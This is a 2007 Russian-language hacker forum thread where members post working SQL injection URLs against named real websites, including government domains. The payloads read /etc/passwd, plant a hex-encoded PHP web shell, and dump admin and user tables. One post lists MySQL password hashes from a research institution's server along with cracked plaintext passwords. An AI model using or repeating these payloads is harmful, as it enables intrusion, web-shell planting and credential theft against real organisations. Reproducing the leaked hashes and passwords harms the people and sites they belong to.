Новые сообщенияНовые сообщения
Аренда магазина аккаунтов
Deer.IO - Создай свой магазин аккаунтов Реклама на форуме

Ответ
 
Опции темы Опции просмотра

SQL Injection

Старый 10.06.2007, 06:57   #1 (permalink)
Администратор
 
Аватар для XekSec
 
XekSec вне форума
Регистрация: 19.05.2007
Сообщений: 1,051
Репутация: 761
Thumbs up SQL Injection

В этой теме постим SQL-инъекции, которые вы нашли

Инъекции должны быть доведенными до ума,т.е как минимум с выводом полей.
Если дальше кавычки в инъекции ничего не будет,ваш пост будет удалятся и минус в репутацию.

Последний раз редактировалось %R00tKit%; 13.08.2010 в 15:15..
  Ответить с цитированием

Рекламные ссылки:
Insorg

Старый 10.06.2007, 06:57   #2 (permalink)
Администратор
 
Аватар для XekSec
 
XekSec вне форума
Регистрация: 19.05.2007
Сообщений: 1,051
Репутация: 761
По умолчанию

www.contagem.mg.gov.br
version, database, user
Код:
http://www.contagem.mg.gov.br/noticia.php?idmateria=-1+union+select+1,2,3,4,5,convert(concat_ws(0x3b,user(),database(),version())+using+latin1),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26/*
etc/passwd
Код:
http://www.contagem.mg.gov.br/noticia.php?idmateria=-1+union+select+1,2,3,4,5,convert(LOAD_FILE(0x2f6574632f706173737764)+using+latin1),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26/*
shell
Код:
http://www.contagem.mg.gov.br/noticia.php?idmateria=-1+union+select+1,2,3,4,5,convert(0x3c3f7068702073797374656d28245f4745545b636d645d293b203f3e+using+latin1),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+from+mysql.user+into_outfile+/*
  Ответить с цитированием

Старый 10.06.2007, 07:20   #3 (permalink)
Администратор
 
Аватар для XekSec
 
XekSec вне форума
Регистрация: 19.05.2007
Сообщений: 1,051
Репутация: 761
По умолчанию

www.zjda.gov.cn
Код:
http://www.zjda.gov.cn/misc.php?xname=CP0GHU0&dname=FM01G11&xpos=1'+union+select+concat_ws(0x3b,user(),database(),version())/*&op=recommend
  Ответить с цитированием

Старый 15.06.2007, 09:12   #4 (permalink)
Junior Member
 
rand0m вне форума
Регистрация: 15.06.2007
Сообщений: 4
Репутация: 1
По умолчанию

gta.com.ua
Код:
http://gta.com.ua/file_sa_details.phtml?id=-24+union+select+1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+admin/*
  Ответить с цитированием

Старый 24.06.2007, 11:34   #5 (permalink)
Junior Member
 
Neorin вне форума
Регистрация: 24.06.2007
Сообщений: 11
Репутация: 2
По умолчанию

www.express-bonus.ru

Код:
http://www.express-bonus.ru/index.php?action=news&act=view&id=-1+union+select+1,concat(user_id,0x3a,username,0x3a%20,user_password,0x3a,user_email,0x3a,user_icq),3,4,%205,6+from+phpbb_users+limit+1,600/*
вот так бывает)))
  Ответить с цитированием

sql
Старый 05.07.2007, 22:22   #6 (permalink)
Junior Member
 
Серенький вне форума
Регистрация: 05.07.2007
Сообщений: 1
Репутация: 1
Arrow sql

http://downloadz.ru/

  Ответить с цитированием

Старый 09.07.2007, 10:21   #7 (permalink)
Junior Member
 
kair вне форума
Регистрация: 09.07.2007
Сообщений: 2
Репутация: 0
По умолчанию

www.buybrand.ru
Код:
http://www.buybrand.ru/rus/index/news?id=780%20union%20select%201,2,name,4,5,passw,7,8%20from%20users/*
  Ответить с цитированием

Старый 12.07.2007, 23:26   #8 (permalink)
Junior Member
 
kair вне форума
Регистрация: 09.07.2007
Сообщений: 2
Репутация: 0
По умолчанию

Код:
http://www.leform.ru/design.php?id=430%20union%20select%201,name,id,4,5,6,7,8,9%20from%20designer/*
  Ответить с цитированием

Старый 26.07.2007, 17:44   #9 (permalink)
Junior Member
 
lex вне форума
Регистрация: 26.07.2007
Сообщений: 3
Репутация: 0
По умолчанию

Код:
http://dart.cshl.edu/DART/public/scripts/list_published_reports.cgi?user_id=-27+union+select+concat(user,%22:%22,password),2+from+mysql.user/*
5.0.16-standard
web_reports
ravi@dart.cshl.edu

root:7c954012190861cd
gpmuser:7b95b1692f2cc5dd
reader:57cb379d50cce781
jeremiah:47047e7757b44620
ravi:00a208111673c63b
phpacct:1c301b3a330e327c
tony:*DDF1A93EC51F6729F5F063CA291C7ABF5B682FDD

============== by limpompo ==========
reader - reader
jeremiah - ptgdb
ravi - sseleert
phpacct - suiluj
=================================


Код:
http://dart.cshl.edu/DART/public/scripts/list_published_reports.cgi?user_id=-27+union+select+load_file('/etc/passwd'),2+from+mysql.user/*
  Ответить с цитированием

Старый 26.07.2007, 18:52   #10 (permalink)
Администратор
 
Аватар для XekSec
 
XekSec вне форума
Регистрация: 19.05.2007
Сообщений: 1,051
Репутация: 761
По умолчанию

gougle.ru
Код:
http://www.gougle.ru/hotcd.php?cd_id=-7287+union+select+1,2,concat_ws(0x3b,user(),database(),version()),4,5,6,7/*
Путег нашли:
Код:
/home/gougle/public_html/hotcd.php
А прав нету =)
Код:
http://www.gougle.ru/hotcd.php?cd_id=-7287+union+select+1,2,concat_ws(0x3b,user(),database(),version()),4,5,6,7+from+mysql.user/*
  Ответить с цитированием
Ответ


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 
Опции темы
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.
Trackbacks are Выкл.
Pingbacks are Выкл.
Refbacks are Выкл.



Друзья форума: Хакерский софт